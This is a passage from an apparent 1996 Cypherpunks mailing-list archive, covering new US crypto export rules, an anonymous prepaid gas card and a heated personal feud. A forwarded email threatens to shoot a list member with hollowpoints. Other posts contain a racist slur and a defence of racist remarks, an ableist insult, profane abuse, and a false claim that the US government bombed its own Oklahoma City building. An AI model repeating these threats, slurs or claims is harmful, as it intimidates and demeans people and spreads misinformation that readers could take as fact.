deserved it!.  He refuses to answer.  He's just a pussy, I guess. 
Like's to make terroristic threats.  To Nam vets, yet.  Ballsy, Tim!

Maybe the Doctor is not to far from wrong.

I would rather have discussed this with you in private e-mail, or 
over a few beers, but you refuse to answer my e-mail.

Received: from you.got.net (root@scir-gotnet.znet.net
[207.167.86.126]) by adnetsol.adnetsol.com (8.6.12/8.6.6) with ESMTP
id UAA29906 for <rwright@adnetsol.com>; Fri, 27 Dec 1996 20:25:14
-0800 Received: from [207.167.93.63] (tcmay.got.net [207.167.93.63])
by you.got.net (8.8.3/8.8.3) with ESMTP id UAA13732 for
<rwright@adnetsol.com>; Fri, 27 Dec 1996 20:17:45 -0800 X-Real-To:
<rwright@adnetsol.com> X-Sender: tcmay@mail.got.net Message-Id:
<v03007800aeea52e5d282@[207.167.93.63]> In-Reply-To:
<199612230801.AAA24862@adnetsol.adnetsol.com> Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii" Date: Fri, 27 Dec 1996
20:32:00 -0800 To: "Ross Wright" <rwright@adnetsol.com> From: "Timothy
C. May" <tcmay@got.net> Subject: Re: Mr. May's Posts.  Other Things.
X-PMFLAGS: 35127424 0

------- Forwarded Message Follows -------
Date:          Fri, 27 Dec 1996 20:32:00 -0800
To:            "Ross Wright" <rwright@adnetsol.com>
From:          "Timothy C. May" <tcmay@got.net>
Subject:       Re: Mr. May's Posts.  Other Things.

At 12:09 AM -0800 12/23/96, Ross Wright wrote:

>hard on him.  This latest rant of his has made me reconsider your
>rough treatment of Mr. May.  I kinda think he deserves a slapping
>right now.

Go ahead with your "slapping."

Of course, I'd treat a "slapping" as an assault. I'd love to put a
clip of hollowpoints through your chest.

Your place or mine?

Just say "No" to "Big Brother Inside"
We got computers, we're tapping phone lines, I know that that ain't
allowed.
---------:---------:---------:---------:---------:---------:---------:
---- Timothy C. May              | Crypto Anarchy: encryption, digital
money, tcmay@got.net  408-728-0152 | anonymous networks, digital
pseudonyms, zero W.A.S.T.E.: Corralitos, CA  | knowledge, reputations,
information markets, Higher Power: 2^1398269     | black markets,
collapse of governments. "National borders aren't even speed bumps on
the information superhighway."









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@USIT.NET>
Date: Mon, 30 Dec 1996 14:32:18 -0800 (PST)
To: Eric Blossom <eb@comsec.com>
Subject: Re: ~digicash at Shell
In-Reply-To: <199612302148.NAA23846@comsec.com>
Message-ID: <Pine.GSO.3.95.961230172945.5019B-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain




On Mon, 30 Dec 1996, Eric Blossom wrote:

> > Shell is now marketing a stored-value card in $25, $50, and $100 face
> > denominations.  The $100 card retails for $94 right now.  I'm not sure if
> > that discount will be a long-term thing or if it's just to get people
> > hooked.  Anyway, the card can be purchased anonymously for cash and can be
> > used to buy anything at Shell.  I like to use the automated
> > pay-at-the-pump gizmos to save time but I don't like to leave a digital
> > footprint behind on my credit card statement for Louis' Legions to peruse,
> > so I think the stored-value card is a step forward for privacy.
> 
> Is this a "stored value smart card", or something like most US phone
> cards, where the "account number" is used to debit a centrally
> maintained account?

It appears to be mag-stripe "dumb card," which is used to debit a
centrally mantained but anonymous pre-paid account.

bd

> 
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc Weber <blancw@microsoft.com>
Date: Mon, 30 Dec 1996 17:38:45 -0800 (PST)
To: "'cypherpunks@toad.com>
Subject: RE: Crypto reg clarification from Commerce Department
Message-ID: <c=US%a=_%p=msft%l=RED-81-MSG-961231013819Z-64772@INET-02-IMC.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


These make more sense with the following modifications to the
clarification:

 (c) Definition of U.S. person. For purposes of this section, the 
term U.S. person includes:
    (1) Any retard who is a citizen of the United States, a 
permanent resident alien from Planet X, or a protected person 
formerly-known-as-criminal as defined by 8 U.S.C. 1324b(a)(3);
    (2) Any juridical organization under surveillance by the United 
States or any jurisdiction within the United States, including foreign 
branches; and
    (3) Any Borgs in the United States.
    
   ..
Blanc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bovine Remailer <haystack@cow.net>
Date: Mon, 30 Dec 1996 15:10:53 -0800 (PST)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <9612302254.AA00731@cow.net>
MIME-Version: 1.0
Content-Type: text/plain


At 5:15 PM 12/29/1996, Timothy C. May wrote:
>This fascist move by the U.S. government is a huge threat to our liberty.
>It may be time to simply give up on communicating with these assholes and
>give them the treatment they have earned.
> ...
>And this a very big one indeed. Not only does it probably put organizations
>like C2 out of business, at least in terms of supporting the development of
>things like the South African and British Web products, but it also may
>mean the *Cypherpunks list itself*, and some of its members, are ipso facto
>in violation of this "giving comfort to the enemy" (to paraphrase) language!
> ...
>This very list advocates violation of the ITARs in various ways (I speak of
>"the list" as a person in the sense of the consensus of the list...there
>may not be unanimity, but the consensus of the vocal members of the list is
>obvious).
>
>
>It may be time for us to go underground. It may be time to take much, much,
>much, much more extreme steps. This fascism is unacceptable.

While Tim May has had many many great ideas, this is not one of them.

To paraphrase Joseph Stalin: Tim, how many divisions do you have?

The cypherpunks have virtually no force at all.  If the battle is
moved to that arena, the cypherpunks (and everybody else) lose big
time.  If the cypherpunks manage to pull off some sort of "extreme
step", those who aren't shot while resisting arrest will go to prison.
Worst of all, most people will applaud the action.  "Extreme steps"
legitimize the radical proposals of the Clipper crowd.

While I wouldn't go so far as to say "I feel your pain", I am
sympathetic with the frustration you must feel when your own
government is the greatest threat to all that it is right and decent.

But, "extreme steps" are the wrong approach and play right into the
hands of the defense establishment.  It saves them the trouble of
implementing a "strategy of tension."

The right approach is to continually reiterate that the cypherpunks
are mainstream and fairly conservative.  Many of us like the "bad boy"
image, but most of what has been proposed is very solidly rooted in
American traditions.

If the ITAR regulations can be amended to make discussions on this
list a "conspiracy", then they are very likely unconstitutional.
Article I, Section I, "All legislative powers herein granted shall be
vested in a congress of the United States..."

Pretty unambiguous.

We should not underestimate the broad public support for private
communications which exists in the United States.  Even people who are
unfamiliar with the issue are shocked when they learn that the U.S.
government is trying to gain access to all communications.

The only people who want GAK are in the government.  There is no
constituency in the population which wants it, and quite a few that do
not.  The more publicly the issue is discussed and the more actively
we scrutinize the lies and deceptions of the U.S. government, the
more successful we will be.

The GAK crowd have not been honest or forthright in their public
statements on their plans.  We must reiterate this again and again and
again.  If they cannot be honest about their proposed policy, how can
we trust them to hold the keys?  Obviously, we cannot.  This will be
obvious to most Americans, and even some reporters.

Red Rackham






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc Weber <blancw@microsoft.com>
Date: Mon, 30 Dec 1996 18:03:53 -0800 (PST)
To: "'cypherpunks@toad.com>
Subject: RE: (Fwd) Re: Mr. May's Posts.  Other Things.
Message-ID: <c=US%a=_%p=msft%l=RED-81-MSG-961231020328Z-64844@INET-02-IMC.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


From:	Ross Wright 

This is the message I got in response to my post regarding Mr. May's
offensive, racist, and bigoted post about ebonics.   I have made
overtures towards peace and tried to explain that I thought that the
Doctor's verbal slapping was not as bad as it seemed, maybe even he
deserved it!.  He refuses to answer.  He's just a pussy, I guess. 
Like's to make terroristic threats.  To Nam vets, yet.  Ballsy, Tim!
.......................................................


You have to understand - Tim is from California.

	In some areas of the country showing someone your middle finger is the
	universal hand signal for "shoot me".  If you are carrying a gun and
give
	such a hand signal you likely to be held at fault if the shooting does
start.
	If you choose to carry, you will be held to a higher standard of
behavior
	than those that don't.

	-Greg Hamilton-
	Self Defense Instructor
	Nov. 19, 1995


   ..
Blanc





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 30 Dec 1996 18:29:25 -0800 (PST)
To: "Ross Wright" <cypherpunks@toad.com
Subject: Re: (Fwd) Re: Mr. May's Posts.  Other Things.
Message-ID: <199612310229.SAA21087@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:33 PM 12/30/96 -0800, Ross Wright wrote:
>This is the message I got in response to my post regarding Mr. May's
>offensive, racist, and bigoted post about ebonics.


His comments were not "offensive, racist, and bigoted."  They were funny, 
intentionally so.  The whole "Ebonics" issue is a hilarious example of 
political-correctness gone mad.  Interestingly, Jesse Jackson tried to make it 
look like the blacks were the victims, the ones most offended by the actions 
of the Oakland schools people.  Embarrassed, maybe, victims no.


(A friend of mine greatly prefers the term, "Niglish."  I try hard to not be 
so...coarse.)


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: solman@MIT.EDU
Date: Mon, 30 Dec 1996 15:33:32 -0800 (PST)
To: m5@vail.tivoli.com
Subject: Re: New crypto regulations
In-Reply-To: <32C7B497.8C2@tivoli.com>
Message-ID: <9612302333.AA21323@ua.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain


|> Does anybody seriously believe that nbody writing these policies has
|> an understanding of OCR software?  An on-line form of code printed
|> in a book is just a quick trip to a scanner away.  They know that.

It has been stated, if not here then elsewhere, that the government intends
to update the recently released policy by also prohibiting the printing of
source code in special OCR fonts. If true, this would corroborate my
assertion as to the reason for the government's explicity exemption of
printed media.

JWS




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Mon, 30 Dec 1996 17:02:27 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: New crypto regulations (fwd)
Message-ID: <199612310101.TAA22964@einstein>
MIME-Version: 1.0
Content-Type: text



Hi all,

Forwarded message:

> Date: Mon, 30 Dec 1996 15:57:28 -0800
> From: Mark Johnson <mark@hercules.reno.nv.us>
> 
> To hell with it, lets just send it over a modem and claim its Analog not
> electronic transfer.  If MA-Bell (or sibling) wants to change it from
> Analog to Digital for overseas transfer then THEY can go after MA-Bell. 
> Then if we can't do that then we would not even be allowed to discuss
> cryptography (code) verbally as it all gets transformed to electrons now
> anyway.  

The distinction between analog and digital is a technicality and not
a distinction I want my civil liberties hanging from.

An analog signal is just a digital signal with a word length greater than
the resolution of the machine. Also one can claim that because electricity
is carried by distinct charges it is digital. Counter this is that the
charges themselves can take on multiplicity of ranges.

A digital signal is just a analog signal of on and off, direct current one
might say that is simply turned on and off.

Ad nausium...

> What is the difference between me reading(using sound waves) code line
> by line to John Doe versus having my computer(using sound waves)
> communicating to John Does's computer,Tape Recorder(high quality), or
> his well atuned ear which understands MODEMese (or was that MODEMonics)?

Realisticaly nothing. The real discussion going on here, broken into a
multiplicity of special interests pov's, is whether we as individuals have a
right to communicate to each other and exactly under what conditions that
communication can be monitored, manipulated, prohibited, etc. Balancing the
theory behind democracy and multiplicity of views versus the prohibition of
various types of acts, distinct and class(ical), which pose threats to
individuals, groups, and potentialy national interests is the point...

If looked at rationaly, saying I can tell you something if written in a
particular code, alphabetic and artistic issues at point, on a certain type
of material is ok while if I transfer the identical information using some
other code and media it is not is looney tunes. The 'control' types would
like us to believe that media is the real issue here, not what is actualy
being said. A point easily confused by somebody who doesn't know what the
word(s) mean.

A very popular view, and not one I consider 'bad', is that we should err on
the side of safety. This means that we don't change the status quo too fast.
Not necessarily because we like the results being measured in human misery
but because while we might relieve their misery in the short term we might
'unbalance' the political situation. History is rife with the results of
such periods. However, I balance this with the realisation that once it is
clear something needs to be done it is better to go ahead and commit to the
results even though we recognise a priori that some results may not
necessarily be to our liking. We just have to deal with them when we figure
out which ones they are. The trick between these two is to find a 'litmus
test' which will provide an observer some sort of measure of their position
between the two (or more) positions.


                                                    Jim Choate
                                                    ravage@ssz.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ross Wright" <rwright@adnetsol.com>
Date: Mon, 30 Dec 1996 19:04:44 -0800 (PST)
To: "Ross Wright" <jimbell@pacifier.com>
Subject: Re: (Fwd) Re: Mr. May's Posts.  Other Things.
Message-ID: <199612310304.TAA16366@adnetsol.adnetsol.com>
MIME-Version: 1.0
Content-Type: text/plain


On or About 30 Dec 96 at 18:16, jim bell wrote:

> At 04:33 PM 12/30/96 -0800, Ross Wright wrote:
> >This is the message I got in response to my post regarding Mr.
> >May's offensive, racist, and bigoted post about ebonics.
> 
> 
> His comments were not "offensive, racist, and bigoted."  They were

Be that as it may, it is still no call for threats of gunplay!  That 
is NOT funny.  I take such things very seriously.

=-=-=-=-=-=-
Ross Wright
King Media: Bulk Sales of Software Media and Duplication Services
http://www.slip.net/~cdr/kingmedia
Voice: 415-206-9906




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ross Wright" <rwright@adnetsol.com>
Date: Mon, 30 Dec 1996 19:12:40 -0800 (PST)
To: "Ross Wright" <rwright@adnetsol.com>
Subject: Re: (Fwd) Re: Mr. May's Posts.  Other Things.
Message-ID: <199612310312.TAA16542@adnetsol.adnetsol.com>
MIME-Version: 1.0
Content-Type: text/plain


On or About 30 Dec 96 at 19:12, Ross Wright wrote:

> On or About 30 Dec 96 at 18:16, jim bell wrote:
> 
> > At 04:33 PM 12/30/96 -0800, Ross Wright wrote:
> > >This is the message I got in response to my post regarding Mr.
> > >May's offensive, racist, and bigoted post about ebonics.
> > 
> > 
> > His comments were not "offensive, racist, and bigoted."  They were
> 
> Be that as it may, it is still no call for threats of gunplay!  That
> is NOT funny.  I take such things very seriously.

Funny, yeah real funny.  In other words:  I'll popa cap in the 
motherfuckers ass just for him thinkin he gonna draw down on me!

It just makes me more and more pissed off!

I gotta have a cuppa coffe, and calm down!

Ross




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ross Wright" <rwright@adnetsol.com>
Date: Mon, 30 Dec 1996 19:24:59 -0800 (PST)
To: "'blancw@microsoft.com>
Subject: RE: (Fwd) Re: Mr. May's Posts.  Other Things.
Message-ID: <199612310325.TAA16845@adnetsol.adnetsol.com>
MIME-Version: 1.0
Content-Type: text/plain


On or About 30 Dec 96 at 18:03, Blanc Weber wrote:

> You have to understand - Tim is from California.
>  If you choose to carry, you will be held to a higher standard of
> behavior
>  than those that don't.

Yes, part of that "higher standard" is to keep your fucking mouth 
shut about that piece in your sholder holster.  Those that brag that 
they are packing and won't hesitate to use it are usually those that 
freeze under fire or snap at the workplace.

A true shooter shut's the fuck up and if needs be, let's the weapon 
do the talking when the time is right.

That mutually assured destruction shit only works for governments.  
In this day and age you better think EVERYONE'S packing, and if you 
shoot your mouth off about your little pea shooter you just make 
yourself a target for the first shot fired.

Ross

=-=-=-=-=-=-
Ross Wright
King Media: Bulk Sales of Software Media and Duplication Services
http://www.slip.net/~cdr/kingmedia
Voice: 415-206-9906




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mrwilhe@odin.cmp.ilstu.edu
Date: Mon, 30 Dec 1996 17:38:56 -0800 (PST)
To: cypherpunks@toad.com
Subject: what is a law if it cant be enforced?
Message-ID: <1.5.4.32.19961231014301.008f0e3c@odin.cmp.ilstu.edu>
MIME-Version: 1.0
Content-Type: text/plain


can our gov possibly enforce this crypto law? --esp over the net?
I think what happend is the dod released the net (arpanet/Internet) to the
people without looking at the implications that could arise.  The people now
control the net and not the gov--and they don't like it!
anyway our government is ruled by the people for the people--so we should
not have any kind of special laws--ones that only apply to the net and not
the rest of the world, after all we have a thing called free speech!
fsh





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ross Wright" <rwright@adnetsol.com>
Date: Mon, 30 Dec 1996 19:37:43 -0800 (PST)
To: Graham-John Bullers <real@freenet.edmonton.ab.ca>
Subject: Re: (Fwd) Re: Mr. May's Posts.  Other Things.
Message-ID: <199612310337.TAA17118@adnetsol.adnetsol.com>
MIME-Version: 1.0
Content-Type: text/plain


On or About 30 Dec 96 at 20:29, Graham-John Bullers wrote:

> You mean we cannot choose to be RACIST BIGOTS shame on you.

Sure you can, I got no problem with open disscussions of views.  Any 
views!  But a private threat of gunplay, that you have no right to!

> 
>         http://www.free
> net.edmonton.ab.ca/~real/index.html
> 
>                                           :
>                                           real@freenet.edmonton.ab.c
>                                           a
> Graham-John Bullers                  email
>                                           :
>                                           ab756@freenet.toronto.on.c
>                                           a
> > Of course, I'd treat a "slapping" as an assault. I'd love to put a
> > clip of hollowpoints through your chest.
> > 
> > Your place or mine?
> > 
> > ---- Timothy C. May              | Crypto Anarchy: encryption,
> > digital

=-=-=-=-=-=-
Ross Wright
King Media: Bulk Sales of Software Media and Duplication Services
http://www.slip.net/~cdr/kingmedia
Voice: 415-206-9906




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Mon, 30 Dec 1996 19:50:58 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Responsibility
In-Reply-To: <1B5RZD28w165w@bwalk.dm.com>
Message-ID: <199612310350.TAA29631@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Dr. Vulis, KOTM, writes:

> Is Brent as goofy as the ASALA terrorist (about to be fired by Earthweb
> for net-abuse), or even goofier?

Kibo-izing the news spool again Dr. Vulis?

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Attila T. Hun" <attila@primenet.com>
Date: Mon, 30 Dec 1996 22:59:15 -0800 (PST)
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: Just another government fuckover: New crypto regulations
In-Reply-To: <9m4qZD23w165w@bwalk.dm.com>
Message-ID: <199612310700.XAA06518@infowest.com>
MIME-Version: 1.0
Content-Type: text/plain


From: Attila T. Hun <attila@primenet.com>
X-Return: attila <attila@hun.org>
X-Originator: attila <attila@hun12.hun.org>
X-SecurityType: None
X-SecurityCode: None
X-KeyID: 1024/C20B6905
X-KeyNo: 23 D0 FA 7F 6A 8F 60 66  BC AF AE 56 98 C0 D7 B0
X-PGPKey: strip spaces and colon from key
    ; -----BEGIN PGP PUBLIC KEY BLOCK-----
    ; Version: 2.6
    ;
    ; mQCNAy5vBesAAAEEAN8cl6vHXrKZ9lFfZDgfyJRr3HidW77Uio7F25QF6QXca5z/
    ; AS3ZrWsa0CjF2nwrqmyb1E5no7dFB+70ZfK8233r7ykVkWRojT+0K71lnUZO4cjG
    ; +d19/ehXkDpkH3iHU7Uyo4ZdXLiI6uoFDS7ilzx8PCKcgvfq7b04kQrCC2kFAAUX
    ; tAZhdHRpbGE=
    ; =cpDk
    ; -----END PGP PUBLIC KEY BLOCK-----
X-Comments: writer is solely irresponsible for his loose tongue
    ; Free Cyberspace is our Democracy. Fuck your CDA. 
    ; Free Information is our Freedom.  Fuck your WIPO, too.  
Errors-To: null@primenet.com
Priority: Normal
Owner: Attila T. Hun <attila@primenet.com>
Sender: Attila T. Hun <attila@primenet.com>
Sent-By: Attila T. Hun <attila@primenet.com>
Return-receipt-to: Attila T. Hun <attila@primenet.com>
Reply-to: Attila T. Hun <attila@primenet.com>
Organization: Home for retired unrepented, degenerate hackers
Date: Mon, 30 Dec 96 19:52:02 +0000
To: cypherpunks <cypherpunks@toad.com>
Cc: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Subject: Re: Just another government fuckover: New crypto regulations
In-Reply-To: <9m4qZD23w165w@bwalk.dm.com>
Bcc: furballs <ppenrod@earthlink.net>

-----BEGIN PGP SIGNED MESSAGE-----

In <9m4qZD23w165w@bwalk.dm.com>, on 12/30/96 
   at 08:07 AM, dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM) said:

::"Attila T. Hun" <attila@primenet.com> writes:

::>     books are and have been protected prior to the US Constitution.

::"Protected" in what sense? Copyright in a fairly recent invention.

        free speech, which is what we are talking about. supposedly 
    absolute freedom of speech in America was in the Articles of 
    Confederation and was a major point of the Declaration of 
    Independence.  free speach was an "intention" of the Magna Carta.

::>     the US Government has not been a legal government for years; it     
::>is a private club which can be bought, and its services sold to the     
::>highest bidder. It is a collection of whores who are part of a cabal
::>of the very rich and powerful; it is totally unaccountable to the
::>public it represents.  Waco, Ruby Ridge, and the bombing of their 
::>own federal building in Oklahoma City in order to scare Joe Couch 
::>Potato into giving up personal freedoms for security are perfect 
::>examples of a government drunk on it owns powers. Just like Oswald, 
::>they have a perfect patsy with the defendants in OKC.

::Like I said the other day, the similarities with the USSR under the 
::last few years of Brezhnev's life are striking.

        just a little bit too close, is it not?  The Kremlin then, and
    the Kremlin of Yeltsin also suffer the same malady: the personal
    expression of power. Gorbi will be remembered in history as not a
    great statesmen as he was initially hailed in the West, but as the
    'great concessionaire,' giving Russia's "imperial" power away. 
    Russia never had a communist government, it was a dictatorship
    somewhat tempered by the power of the apparati (which under Stalin
    was a joke); it just so happened they practiced the art of the
    commune in collective farming --except they stole the bulk of the
    communes' production.  Any concept of the commune ownership was
    fantasy. 

        but the bottom line with Brezhnev was the "drunk with power" of
    each of the petty fiefdoms.  Old Joe and Beria is a perfect example,
    except Joe took care of his problem promptly to prove the rule that
    'thou shall not covet thy boss...'<g>. 

        compare today in Russia: Lebed is a prime example. Even under
    Brezhnev he would have walked the one way tunnel. Fact is, it
    appears Lebed has been closer to the mark than the rest of the
    pompous fools; but that certainly has not helped if one considers
    Lebed would need to assume absolute power in order to clear the
    errant course of the Russian ship of state --absolute power corrupts
    absolutely. 

        the US has two or three power factors depending on your point of
    view. The visible US government with a totally corrupt and
    depiscable asshole at the helm --a sublimely and malignantly corrupt
    man installed as a puppet gone drunk on his cocaine power pack;  he
    thinks he has shaken his masters and his battle is to control the
    CIA and the rest of the hidden spook show.  Even his loyal puppy,
    John Deutsch, was unable to control the CIA, let alone the rest of
    the apparati.  The lame duck cabinet is more impotent than the last,
    who almost to a man jumped as rats from a sinking ship.  His thrust
    for power is masked in rhetoric of "for the good of the country" or
    "to protect the country from the evils of private speech which might
    be criminal or subversive" that we may all be free.  Is it
    coincidence free speech is the cornerstone of democracy? 

        So who does control the real apparati?  check behind the silent
    curtains of the dark drawing rooms; check behind the facade of US
    Department of State postings since WWII, and compare names with
    events and the social register and the rolls of Harvard, Yale, and
    Princeton; check the bunkers at Fort Meade and other places; check
    the shadows and the denials; particularly check the denials. 

        don't wast your time with the myriad of 'culprits' starting with
    the Bilderbergers, the CFR, the TLA, the Bavarian Illuminati, etc. 
    they are just drinking clubs of the power hungry united only by a
    common greed.  greed and absolute power as America careens into
    history and disenfranchisement. 

        is there then still a third force?  speculation?  fact! 
    avengers?  too little, too late?  hunted to the status of endangered
    species or even to extinction?  sacrificial lambs or goats for the
    alter of the temples of the doomed?  or saviours?

::>     books are an intellectual 'solution' to the problem. the real    
::>problem is the hardware. in order to negate governments and their    
::>virtually stated intentions of blocking our inalienable freedoms,    
::>particularly freedom of speach, we must be able to distribute     
::>universal crypto worldwide, and be able to improve it as the shadow      
::>governments of the various spook shows improve their ability to
::>break our code.

::Yes, but the impotent "cypher punks" can't write or distribute code. 
::They can only flame and rant and pull plugs.

        Ah, dimitri, my quasi-friend, my quasi-enemy, that is the
    question, is it not?  Can cypherpunks write code?  Some like to
    argue, and still can and do write code.  Others only pontificate; 
    and others lurk for the false rush of the ephemeral or fantastical
    power.
 
        dimitri, you've never been a lurker in your life; then why do
    you participate in cypherpunks if they are, to a [wo]man, nothing
    but wankers? (I guess that works for the gentle sex, too. no? <g>). 

        Ah, dimitri, you're secret is out. you are here to harangue!
 
::>     if you do not have the balls to do it, you are not for freedom.

::If you are a "cypher punk", you are not for freedom.

        No, no, no, dimitri.  Cypherpunks are absolute in their demands
    for freedom.  Most are making the choice to demand freedom while
    they play in the band and the Titanic sinks.  Shall their last song
    be "God Bless America" or "Nearer my Lord to Thee" --it's all the
    same is it not?  They, and the rest of the complacent Americans,
    will go down with the ship (as will the fighters without support). 

        Talk is cheap, dimitri.  Let's see a little action. 

  ==
   Lord grant me the serenity to accept the things I cannot change.
     The courage to change the things I can.
       And the wisdom to hide the bodies of the people 
         I had to kill because they pissed me off.
            --attila

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: latin1
Comment: Encrypted with 2.6.3i. Requires 2.6 or later.

iQCVAwUBMsi5Kb04kQrCC2kFAQHTTgQAuoUu6efW5029X6N3LdvoBwQf3VAXQnLr
hW8cR0HxFBJTCx59RjwxgkPxYFFEth83MR1dGL4jNOYTcjMAZt4IEKMPMa5mcjD4
nvw3oKYmBIbqmhC15Wem9kRd2XIutt3wQdYdTyhLRnj4Qrcl4wk0ioThvy14lMSa
T0hYUePgUWM=
=jiJa
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Mon, 30 Dec 1996 19:55:09 -0800 (PST)
To: Ross Wright <rwright@adnetsol.com>
Subject: Re: (Fwd) Re: Mr. May's Posts. Other Things.
In-Reply-To: <199612310304.TAA16366@adnetsol.adnetsol.com>
Message-ID: <Pine.SUN.3.91.961230194801.17467A-100000@crl2.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Mon, 30 Dec 1996, Ross Wright wrote:

> Be that as it may, it is still no call for threats of gunplay!  That 
> is NOT funny.  I take such things very seriously.

So let me see if I've got this right.  Threatening to slap 
someone is okay, but threatening to defend one's self from such
an attack is not okay?  Interesting.  I guess the old saying
still applies, "the essence of humor is WHOSE ox is being gored."


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 30 Dec 1996 17:07:32 -0800 (PST)
To: Lucky Green <shamrock@netcom.com>
Subject: Re: Crypto reg clarification from Commerce Department
Message-ID: <1.5.4.32.19961231010158.006d9ce8@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Lucky Green  wrote:

>I just got of the phone with Bruce Kutz, Export Policy Analyst, Office of
>Strategic Trade and Foreign Policy Controls. (202) 482-0092. He seems to be
>the contact person for the new regs.

Well done, Lucky.

This is what's needed to kick off a lot of commentary during the next
45-days. Backed by research, to be sure. The outpouring of such
commentary on the full EAR from May 1995 to March 1996 shaped the
final document, and that process is an excellent case study for how
to affect the final form of the latest crypto regs.

It's worth perusing the full EAR in the Federal Register: March 25, 1996 
(Volume 61, Number 58), Pages 12713 et seq. for 325 pages (well 
over a 2.5MB -- it's also on our site, see URL below).

Here's the portion of the EAR that Lucky and Kutz discussed:

[Page 12805]

Sec. 744.6  Restrictions on certain activities of U.S. persons.

    (a) General prohibitions--(1) Activities related to exports. (i) No 
U.S. person as defined in paragraph (c) of this section may, without a 
license from BXA, export, reexport, or transfer to or in any country 
other country, any item where that person knows that such item:
    (A) Will be used in the design, development, production, or use of 
nuclear explosive devices in or by a country listed in Country Group 
D:2 (see Supplement No. 1 to part 740 of the EAR).
    (B) Will be used in the design, development, production, or use of 
missiles in or by a country listed in Country Group D:4 (see Supplement 
No. 1 to part 740 of the EAR); or
    (C) Will be used in the design, development, production, 
stockpiling, or use of chemical or biological weapons in or by a 
country listed in Country Group D:3 (see Supplement No. 1 to part 740 
of the EAR).
    (ii) No U.S. person shall, without a license from BXA, knowingly 
support an export, reexport, or transfer that does not have a license 
as required by this section. Support means any action, including 
financing, transportation, and freight forwarding, by which a person 
facilitates an export, reexport, or transfer without being the actual 
exporter or reexporter.
    (2) Other activities unrelated to exports. No U.S. person shall, 
without a license from BXA:
    (i) Perform any contract, service, or employment that the U.S. 
person knows will directly assist in the design, development, 
production, or use of missiles in or by a country listed in Country 
Group D:4 (see Supplement No. 1 to part 740 of the EAR); or
    (ii) Perform any contract, service, or employment that the U.S. 
person knows directly will directly assist in the design, development, 
production, stockpiling, or use of chemical or biological weapons in or 
by a country listed in Country Group D:3 (see Supplement No. 1 to part 
740 of the EAR).
    (3) Whole plant requirement. No U.S. person shall, without a 
license from BXA, participate in the design, construction, export, or 
reexport of a whole plant to make chemical weapons precursors 
identified in ECCN 1C350, in countries other than those listed in 
Country Group A:3 (Australia Group) (See Supplement No. 1 to part 740 
of the EAR).
    (b) Additional prohibitions on U.S. persons informed by BXA. BXA 
may inform U.S. persons, either individually or through amendment to 
the EAR, that a license is required because an activity could involve 
the types of participation and support described in paragraph (a) of 
this section anywhere in the world.
    Specific notice is to be given only by, or at the direction of, the 
Deputy Assistant Secretary for Export Administration. When such notice 
is provided orally, it will be followed by a written notice within two 
working days signed by the Deputy Assistant Secretary for Export 
Administration. However, the absence of any such notification does not 
excuse the exporter from compliance with the license requirements of 
paragraph (a) of this section.
    (c) Definition of U.S. person. For purposes of this section, the 
term U.S. person includes:
    (1) Any individual who is a citizen of the United States, a 
permanent resident alien of the United States, or a protected 
individual as defined by 8 U.S.C. 1324b(a)(3);
    (2) Any juridical person organized under the laws of the United 
States or any jurisdiction within the United States, including foreign 
branches; and
    (3) Any person in the United States.
    (d) Exceptions. No License Exceptions apply to the prohibitions 
described in paragraphs (a) and (b) of this section.
    (e) License review standards. Applications to engage in activities 
otherwise prohibited by this section will be denied if the activities 
would make a material contribution to the design, development, 
production, stockpiling, or use of chemical or biological weapons, or 
of missiles.

-----

The EAR covers all kinds of exports, so encryption and cryptography
provisions are found by searching. The Federal Register published it
in seven 50 page chunks, and is available at:

     http://www.access.gpo.gov/su_docs/aces/aces140.html

Enter the search term: "Page 12713" (with quotes; repeat six times in 
sequence).

We've combined the seven parts for searching:

